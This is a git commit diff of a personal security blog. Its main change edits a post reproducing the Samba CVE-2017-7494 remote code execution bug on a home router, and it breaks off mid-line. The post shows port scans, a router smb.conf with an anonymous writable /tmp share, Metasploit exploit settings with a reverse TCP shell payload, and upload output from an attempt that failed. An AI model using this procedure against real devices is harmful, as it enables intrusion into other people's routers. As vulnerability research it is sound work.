bakabtw/Cool-Y.github.io
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Site updated: 2019-07-27 14:41:41

Browse Source
This commit is contained in:
Cool-Y 2019-07-27 14:42:04 +08:00
parent 50ac5928c3
commit b13450713e
100 changed files with 171 additions and 166 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
2000/01/01/hello-world/index.html
View File

@ -641,7 +641,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
2018/11/16/BIBA访问控制模型实现(python)/index.html
View File

@ -829,7 +829,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
2018/12/15/miio-control/index.html
View File

@ -731,7 +731,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
2018/12/23/基于规则引擎发现IOT设备/index.html
View File

@ -731,7 +731,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
2018/12/25/TCPDUMP拒绝服务攻击漏洞/index.html
View File

@ -736,7 +736,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
2019/01/16/wifi半双工侧信道攻击学习笔记/index.html
View File

@ -859,7 +859,7 @@ Server -------wire----------|
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
2019/02/22/qq数据库的加密解密/index.html
View File

@ -708,7 +708,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

2
2019/03/16/小米固件工具mkxqimage/index.html
View File

@ -717,7 +717,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

6
2019/03/23/auto-send-WX/index.html
View File

@ -528,8 +528,8 @@
<div class="post-nav-prev post-nav-item"> <div class="post-nav-prev post-nav-item">
<a href="/2019/03/25/Samba-CVE/" rel="prev" title="小米路由器与Samba漏洞CVE-2017-7494"> <a href="/2019/03/25/Samba-CVE/" rel="prev" title="某厂商路由器与Samba漏洞CVE-2017-7494">
小米路由器与Samba漏洞CVE-2017-7494 <i class="fa fa-chevron-right"></i> 某厂商路由器与Samba漏洞CVE-2017-7494 <i class="fa fa-chevron-right"></i>
</a> </a>
</div> </div>
@ -725,7 +725,7 @@
<i class="fa fa-area-chart"></i> <i class="fa fa-area-chart"></i>
</span> </span>
<span title="Site words total count">67.6k</span> <span title="Site words total count">67.7k</span>
</div> </div>

61
2019/03/25/Samba-CVE/index.html
View File

@ -79,13 +79,13 @@
<meta name="description" content="小米路由器与Samba漏洞CVE-2017-7494漏洞描述Samba服务器软件存在远程执行代码漏洞。攻击者可以利用客户端将指定库文件上传到具有可写权限的共享目录会导致服务器加载并执行指定的库文件。具体执行条件如下 服务器打开了文件/打印机共享端口445让其能够在公网上访问 共享文件拥有写入权限 恶意攻击者需猜解Samba服务端共享目录的物理路径 Samba介绍Samba是在Lin"> <meta name="description" content="漏洞描述Samba服务器软件存在远程执行代码漏洞。攻击者可以利用客户端将指定库文件上传到具有可写权限的共享目录会导致服务器加载并执行指定的库文件。具体执行条件如下 服务器打开了文件/打印机共享端口445让其能够在公网上访问 共享文件拥有写入权限 恶意攻击者需猜解Samba服务端共享目录的物理路径 Samba介绍Samba是在Linux和Unix系统上实现SMB协议的一个免费软件">
<meta name="keywords" content="Samba,远程执行,CVE"> <meta name="keywords" content="Samba,远程执行,CVE">
<meta property="og:type" content="article"> <meta property="og:type" content="article">
<meta property="og:title" content="小米路由器与Samba漏洞CVE-2017-7494"> <meta property="og:title" content="某厂商路由器与Samba漏洞CVE-2017-7494">
<meta property="og:url" content="https://cool-y.github.io/2019/03/25/Samba-CVE/index.html"> <meta property="og:url" content="https://cool-y.github.io/2019/03/25/Samba-CVE/index.html">
<meta property="og:site_name" content="混元霹雳手"> <meta property="og:site_name" content="混元霹雳手">
<meta property="og:description" content="小米路由器与Samba漏洞CVE-2017-7494漏洞描述Samba服务器软件存在远程执行代码漏洞。攻击者可以利用客户端将指定库文件上传到具有可写权限的共享目录会导致服务器加载并执行指定的库文件。具体执行条件如下 服务器打开了文件/打印机共享端口445让其能够在公网上访问 共享文件拥有写入权限 恶意攻击者需猜解Samba服务端共享目录的物理路径 Samba介绍Samba是在Lin"> <meta property="og:description" content="漏洞描述Samba服务器软件存在远程执行代码漏洞。攻击者可以利用客户端将指定库文件上传到具有可写权限的共享目录会导致服务器加载并执行指定的库文件。具体执行条件如下 服务器打开了文件/打印机共享端口445让其能够在公网上访问 共享文件拥有写入权限 恶意攻击者需猜解Samba服务端共享目录的物理路径 Samba介绍Samba是在Linux和Unix系统上实现SMB协议的一个免费软件">
<meta property="og:locale" content="zh-Hans"> <meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/02-00-46.png"> <meta property="og:image" content="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/02-00-46.png">
<meta property="og:image" content="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/01-59-58.jpg"> <meta property="og:image" content="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/01-59-58.jpg">
@ -100,10 +100,10 @@
<meta property="og:image" content="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/01-38-28.jpg"> <meta property="og:image" content="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/01-38-28.jpg">
<meta property="og:image" content="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/01-43-02.jpg"> <meta property="og:image" content="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/01-43-02.jpg">
<meta property="og:image" content="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/01-45-01.png"> <meta property="og:image" content="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/01-45-01.png">
<meta property="og:updated_time" content="2019-04-15T07:35:38.080Z"> <meta property="og:updated_time" content="2019-07-27T06:39:41.484Z">
<meta name="twitter:card" content="summary"> <meta name="twitter:card" content="summary">
<meta name="twitter:title" content="小米路由器与Samba漏洞CVE-2017-7494"> <meta name="twitter:title" content="某厂商路由器与Samba漏洞CVE-2017-7494">
<meta name="twitter:description" content="小米路由器与Samba漏洞CVE-2017-7494漏洞描述Samba服务器软件存在远程执行代码漏洞。攻击者可以利用客户端将指定库文件上传到具有可写权限的共享目录会导致服务器加载并执行指定的库文件。具体执行条件如下 服务器打开了文件/打印机共享端口445让其能够在公网上访问 共享文件拥有写入权限 恶意攻击者需猜解Samba服务端共享目录的物理路径 Samba介绍Samba是在Lin"> <meta name="twitter:description" content="漏洞描述Samba服务器软件存在远程执行代码漏洞。攻击者可以利用客户端将指定库文件上传到具有可写权限的共享目录会导致服务器加载并执行指定的库文件。具体执行条件如下 服务器打开了文件/打印机共享端口445让其能够在公网上访问 共享文件拥有写入权限 恶意攻击者需猜解Samba服务端共享目录的物理路径 Samba介绍Samba是在Linux和Unix系统上实现SMB协议的一个免费软件">
<meta name="twitter:image" content="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/02-00-46.png"> <meta name="twitter:image" content="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/02-00-46.png">
@ -140,7 +140,7 @@
<title>小米路由器与Samba漏洞CVE-2017-7494 | 混元霹雳手</title> <title>某厂商路由器与Samba漏洞CVE-2017-7494 | 混元霹雳手</title>
@ -336,7 +336,7 @@
<h1 class="post-title" itemprop="name headline">小米路由器与Samba漏洞CVE-2017-7494</h1> <h1 class="post-title" itemprop="name headline">某厂商路由器与Samba漏洞CVE-2017-7494</h1>
<div class="post-meta"> <div class="post-meta">
@ -388,7 +388,7 @@
<span id="/2019/03/25/Samba-CVE/" class="leancloud_visitors" data-flag-title="小米路由器与Samba漏洞CVE-2017-7494"> <span id="/2019/03/25/Samba-CVE/" class="leancloud_visitors" data-flag-title="某厂商路由器与Samba漏洞CVE-2017-7494">
<span class="post-meta-divider">|</span> <span class="post-meta-divider">|</span>
<span class="post-meta-item-icon"> <span class="post-meta-item-icon">
<i class="fa fa-eye"></i> <i class="fa fa-eye"></i>
@ -411,7 +411,7 @@
</span> </span>
<span title="字数统计"> <span title="字数统计">
1.6k 字 1.7k 字
</span> </span>
@ -425,7 +425,7 @@
</span> </span>
<span title="阅读时长"> <span title="阅读时长">
6 分钟 7 分钟
</span> </span>
</div> </div>
@ -446,7 +446,7 @@
<h1 id="小米路由器与Samba漏洞CVE-2017-7494"><a href="#小米路由器与Samba漏洞CVE-2017-7494" class="headerlink" title="小米路由器与Samba漏洞CVE-2017-7494"></a>小米路由器与Samba漏洞CVE-2017-7494</h1><h2 id="漏洞描述"><a href="#漏洞描述" class="headerlink" title="漏洞描述"></a>漏洞描述</h2><p>Samba服务器软件存在远程执行代码漏洞。攻击者可以利用客户端将指定库文件上传到具有可写权限的共享目录会导致服务器加载并执行指定的库文件。<br>具体执行条件如下:</p> <h1 id="漏洞描述"><a href="#漏洞描述" class="headerlink" title="漏洞描述"></a>漏洞描述</h1><p>Samba服务器软件存在远程执行代码漏洞。攻击者可以利用客户端将指定库文件上传到具有可写权限的共享目录会导致服务器加载并执行指定的库文件。<br>具体执行条件如下:</p>
<ol> <ol>
<li><p>服务器打开了文件/打印机共享端口445让其能够在公网上访问</p> <li><p>服务器打开了文件/打印机共享端口445让其能够在公网上访问</p>
</li> </li>
@ -455,31 +455,34 @@
<li><p>恶意攻击者需猜解Samba服务端共享目录的物理路径</p> <li><p>恶意攻击者需猜解Samba服务端共享目录的物理路径</p>
</li> </li>
</ol> </ol>
<h2 id="Samba介绍"><a href="#Samba介绍" class="headerlink" title="Samba介绍"></a>Samba介绍</h2><p>Samba是在Linux和Unix系统上实现SMB协议的一个免费软件由服务器及客户端程序构成。SMBServer Messages Block信息服务块是一种在局域网上共享文件和打印机的一种通信协议它为局域网内的不同计算机之间提供文件及打印机等资源的共享服务。</p> <h1 id="Samba介绍"><a href="#Samba介绍" class="headerlink" title="Samba介绍"></a>Samba介绍</h1><p>Samba是在Linux和Unix系统上实现SMB协议的一个免费软件由服务器及客户端程序构成。SMBServer Messages Block信息服务块是一种在局域网上共享文件和打印机的一种通信协议它为局域网内的不同计算机之间提供文件及打印机等资源的共享服务。</p>
<p>SMB协议是客户机/服务器型协议客户机通过该协议可以访问服务器上的共享文件系统、打印机及其他资源。通过设置“NetBIOS over TCP/IP”使得Samba不但能与局域网络主机分享资源还能与全世界的电脑分享资源。</p> <p>SMB协议是客户机/服务器型协议客户机通过该协议可以访问服务器上的共享文件系统、打印机及其他资源。通过设置“NetBIOS over TCP/IP”使得Samba不但能与局域网络主机分享资源还能与全世界的电脑分享资源。</p>
<h2 id="漏洞成因"><a href="#漏洞成因" class="headerlink" title="漏洞成因"></a>漏洞成因</h2><p>处于\source3\rpc_server\src_pipe.c的is_known_pipename()函数未对传进来的管道名pipename的路径分隔符/进行识别过滤导致可以用绝对路径调用恶意的so文件从而远程任意代码执行。<br>首先看到is_known_pipename()函数<br><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/02-00-46.png" alt></p> <p>某厂商路由器的smbd版本为4.0.21该漏洞影响Samba 3.5.0到4.6.4/4.5.10/4.4.14的中间版本。</p>
<p>跟进到smb_probe_module()<br><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/01-59-58.jpg" alt></p> <h1 id="漏洞成因"><a href="#漏洞成因" class="headerlink" title="漏洞成因"></a>漏洞成因</h1><p>处于<code>\source3\rpc_server\src_pipe.c的is_known_pipename()</code>函数未对传进来的管道名<code>pipename</code>的路径分隔符<code>/</code>进行识别过滤导致可以用绝对路径调用恶意的so文件从而远程任意代码执行。<br>首先看到<code>is_known_pipename()`</code>函数<br><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/02-00-46.png" alt></p>
<p>再跟进到do_smb_load_module(),发现调用的过程就在其中,调用了传进来的moudule_name对应的init_samba_module函数<br><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/02-01-19.jpg" alt></p> <p>跟进到<code>smb_probe_module()</code><br><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/01-59-58.jpg" alt></p>
<p>我们可以通过smb服务上传一个恶意的so文件该文件包含一个输出函数init_samba_module随后通过上述过程进行调用执行任意代码。</p> <p>再跟进到<code>do_smb_load_module()</code>,发现调用的过程就在其中,调用了传进来的moudule_name对应的init_samba_module函数<br><img src="https://www.wzsite.cn/2018/07/20/Samba%E8%BF%9C%E7%A8%8B%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8%E5%88%86%E6%9E%90%20CVE-2017-7494/02-01-19.jpg" alt></p>
<h2 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a>漏洞复现</h2><h3 id="小米路由器"><a href="#小米路由器" class="headerlink" title="小米路由器"></a>小米路由器</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">netstat -apnt</span><br><span class="line">tcp 0 0 192.168.31.1:445 0.0.0.0:* LISTEN 0 572 1917/smbd</span><br><span class="line"></span><br><span class="line">nmap 192.168.31.1</span><br><span class="line">139/tcp open netbios-ssn</span><br><span class="line">445/tcp open microsoft-ds</span><br></pre></td></tr></table></figure> <p>我们可以通过smb服务上传一个恶意的so文件随后通过上述过程进行调用执行任意代码。</p>
<h1 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a>漏洞复现</h1><h2 id="某路由器满足条件"><a href="#某路由器满足条件" class="headerlink" title="某路由器满足条件"></a>某路由器满足条件</h2><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">netstat -apnt</span><br><span class="line">tcp 0 0 192.168.31.1:445 0.0.0.0:* LISTEN 0 572 1917/smbd</span><br><span class="line"></span><br><span class="line">nmap 192.168.31.1</span><br><span class="line">139/tcp open netbios-ssn</span><br><span class="line">445/tcp open microsoft-ds</span><br></pre></td></tr></table></figure>
<p><strong><em>端口已开启</em></strong><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><span class="line">vim /etc/samba/smb.conf</span><br><span class="line"> deadtime = 30</span><br><span class="line"> domain master = yes</span><br><span class="line"> encrypt passwords = true</span><br><span class="line"> enable core files = no</span><br><span class="line"> guest account = nobody</span><br><span class="line"> guest ok = yes</span><br><span class="line"> invalid users =</span><br><span class="line"> local master = yes</span><br><span class="line"> load printers = no</span><br><span class="line"> map to guest = Bad User</span><br><span class="line"> min receivefile size = 16384</span><br><span class="line"> null passwords = yes</span><br><span class="line"> obey pam restrictions = yes</span><br><span class="line"> passdb backend = smbpasswd</span><br><span class="line"> preferred master = yes</span><br><span class="line"> printable = no</span><br><span class="line"> smb encrypt = disabled</span><br><span class="line"> smb passwd file = /etc/samba/smbpasswd</span><br><span class="line"> socket options = SO_SNDBUFFORCE=1048576 SO_RCVBUFFORCE=1048576</span><br><span class="line"> smb2 max trans = 1048576</span><br><span class="line"> smb2 max write = 1048576</span><br><span class="line"> smb2 max read = 1048576</span><br><span class="line"> write cache size = 262144</span><br><span class="line"> syslog = 2</span><br><span class="line"> syslog only = yes</span><br><span class="line"> use sendfile = yes</span><br><span class="line"> writeable = yes</span><br><span class="line"> log level = 1</span><br><span class="line"> unicode = True</span><br><span class="line"> max log size = 500</span><br><span class="line"> log file = /tmp/log/samba.log</span><br><span class="line"> server role = STANDALONE</span><br><span class="line"></span><br><span class="line">[homes]</span><br><span class="line"> comment = Home Directories</span><br><span class="line"> browsable = no</span><br><span class="line"> read only = no</span><br><span class="line"> create mode = 0750</span><br><span class="line"></span><br><span class="line">[data] ***SMB_SHARE_NAME***</span><br><span class="line"> path = /tmp ***SMB_FOLDER***</span><br><span class="line"> read only = no ***具备可写权限***</span><br><span class="line"> guest ok = yes ***允许匿名***</span><br><span class="line"> create mask = 0777</span><br><span class="line"> directory mask = 0777</span><br></pre></td></tr></table></figure></p> <p><strong><em>端口已开启</em></strong><br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><span class="line">vim /etc/samba/smb.conf</span><br><span class="line"> deadtime = 30</span><br><span class="line"> domain master = yes</span><br><span class="line"> encrypt passwords = true</span><br><span class="line"> enable core files = no</span><br><span class="line"> guest account = nobody</span><br><span class="line"> guest ok = yes</span><br><span class="line"> invalid users =</span><br><span class="line"> local master = yes</span><br><span class="line"> load printers = no</span><br><span class="line"> map to guest = Bad User</span><br><span class="line"> min receivefile size = 16384</span><br><span class="line"> null passwords = yes</span><br><span class="line"> obey pam restrictions = yes</span><br><span class="line"> passdb backend = smbpasswd</span><br><span class="line"> preferred master = yes</span><br><span class="line"> printable = no</span><br><span class="line"> smb encrypt = disabled</span><br><span class="line"> smb passwd file = /etc/samba/smbpasswd</span><br><span class="line"> socket options = SO_SNDBUFFORCE=1048576 SO_RCVBUFFORCE=1048576</span><br><span class="line"> smb2 max trans = 1048576</span><br><span class="line"> smb2 max write = 1048576</span><br><span class="line"> smb2 max read = 1048576</span><br><span class="line"> write cache size = 262144</span><br><span class="line"> syslog = 2</span><br><span class="line"> syslog only = yes</span><br><span class="line"> use sendfile = yes</span><br><span class="line"> writeable = yes</span><br><span class="line"> log level = 1</span><br><span class="line"> unicode = True</span><br><span class="line"> max log size = 500</span><br><span class="line"> log file = /tmp/log/samba.log</span><br><span class="line"> server role = STANDALONE</span><br><span class="line"></span><br><span class="line">[homes]</span><br><span class="line"> comment = Home Directories</span><br><span class="line"> browsable = no</span><br><span class="line"> read only = no</span><br><span class="line"> create mode = 0750</span><br><span class="line"></span><br><span class="line">[data] ***SMB_SHARE_NAME***</span><br><span class="line"> path = /tmp ***SMB_FOLDER***</span><br><span class="line"> read only = no ***具备可写权限***</span><br><span class="line"> guest ok = yes ***允许匿名***</span><br><span class="line"> create mask = 0777</span><br><span class="line"> directory mask = 0777</span><br></pre></td></tr></table></figure></p>
<p><strong><em>具有可写权限、目录为/tmp</em></strong></p> <p><strong><em>具有可写权限、目录为/tmp</em></strong></p>
<h2 id="攻击使用metasploit"><a href="#攻击使用metasploit" class="headerlink" title="攻击使用metasploit"></a>攻击使用metasploit</h2><h3 id="设置攻击参数"><a href="#设置攻击参数" class="headerlink" title="设置攻击参数"></a>设置攻击参数</h3><p>靶机是小米路由器R3它的系统为mips架构但是这个库好像对它的支持不是很好<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">show options</span><br><span class="line"></span><br><span class="line">Module options (exploit/linux/samba/is_known_pipename):</span><br><span class="line"></span><br><span class="line"> Name Current Setting Required Description</span><br><span class="line"> ---- --------------- -------- -----------</span><br><span class="line"> RHOSTS 192.168.31.1 yes The target address range or CIDR identifier</span><br><span class="line"> RPORT 445 yes The SMB service port (TCP)</span><br><span class="line"> SMB_FOLDER no The directory to use within the writeable SMB share</span><br><span class="line"> SMB_SHARE_NAME no The name of the SMB share containing a writeable directory</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Payload options (generic/shell_reverse_tcp):</span><br><span class="line"></span><br><span class="line"> Name Current Setting Required Description</span><br><span class="line"> ---- --------------- -------- -----------</span><br><span class="line"> LHOST 192.168.216.129 yes The listen address (an interface may be specified)</span><br><span class="line"> LPORT 4444 yes The listen port</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Exploit target:</span><br><span class="line"></span><br><span class="line"> Id Name</span><br><span class="line"> -- ----</span><br><span class="line"> 7 Linux MIPSLE</span><br></pre></td></tr></table></figure></p> <h2 id="攻击使用metasploit"><a href="#攻击使用metasploit" class="headerlink" title="攻击使用metasploit"></a>攻击使用metasploit</h2><h3 id="设置攻击参数"><a href="#设置攻击参数" class="headerlink" title="设置攻击参数"></a>设置攻击参数</h3><p>靶机是某厂商路由器它的系统为mips架构但是这个库好像对它的支持不是很好<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">show options</span><br><span class="line"></span><br><span class="line">Module options (exploit/linux/samba/is_known_pipename):</span><br><span class="line"></span><br><span class="line"> Name Current Setting Required Description</span><br><span class="line"> ---- --------------- -------- -----------</span><br><span class="line"> RHOSTS 192.168.31.1 yes The target address range or CIDR identifier</span><br><span class="line"> RPORT 445 yes The SMB service port (TCP)</span><br><span class="line"> SMB_FOLDER no The directory to use within the writeable SMB share</span><br><span class="line"> SMB_SHARE_NAME no The name of the SMB share containing a writeable directory</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Payload options (generic/shell_reverse_tcp):</span><br><span class="line"></span><br><span class="line"> Name Current Setting Required Description</span><br><span class="line"> ---- --------------- -------- -----------</span><br><span class="line"> LHOST 192.168.216.129 yes The listen address (an interface may be specified)</span><br><span class="line"> LPORT 4444 yes The listen port</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">Exploit target:</span><br><span class="line"></span><br><span class="line"> Id Name</span><br><span class="line"> -- ----</span><br><span class="line"> 7 Linux MIPSLE</span><br></pre></td></tr></table></figure></p>
<h3 id="执行攻击"><a href="#执行攻击" class="headerlink" title="执行攻击"></a>执行攻击</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">exploit</span><br><span class="line"></span><br><span class="line">[*] Started reverse TCP handler on 192.168.216.129:4444</span><br><span class="line">[*] 192.168.31.1:445 - Using location \\192.168.31.1\data\ for the path</span><br><span class="line">[*] 192.168.31.1:445 - Retrieving the remote path of the share &apos;data&apos;</span><br><span class="line">[*] 192.168.31.1:445 - Share &apos;data&apos; has server-side path &apos;/tmp</span><br><span class="line">[*] 192.168.31.1:445 - Uploaded payload to \\192.168.31.1\data\KcQiOcbk.so</span><br><span class="line">[*] 192.168.31.1:445 - Loading the payload from server-side path /tmp/KcQiOcbk.so using \\PIPE\/tmp/KcQiOcbk.so...</span><br><span class="line">[-] 192.168.31.1:445 - &gt;&gt; Failed to load STATUS_OBJECT_NAME_NOT_FOUND</span><br><span class="line">[*] 192.168.31.1:445 - Loading the payload from server-side path /tmp/KcQiOcbk.so using /tmp/KcQiOcbk.so...</span><br><span class="line">[-] 192.168.31.1:445 - &gt;&gt; Failed to load STATUS_OBJECT_NAME_NOT_FOUND</span><br><span class="line">[*] Exploit completed, but no session was created.</span><br></pre></td></tr></table></figure> <h3 id="执行攻击"><a href="#执行攻击" class="headerlink" title="执行攻击"></a>执行攻击</h3><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">exploit</span><br><span class="line"></span><br><span class="line">[*] Started reverse TCP handler on 192.168.216.129:4444</span><br><span class="line">[*] 192.168.31.1:445 - Using location \\192.168.31.1\data\ for the path</span><br><span class="line">[*] 192.168.31.1:445 - Retrieving the remote path of the share &apos;data&apos;</span><br><span class="line">[*] 192.168.31.1:445 - Share 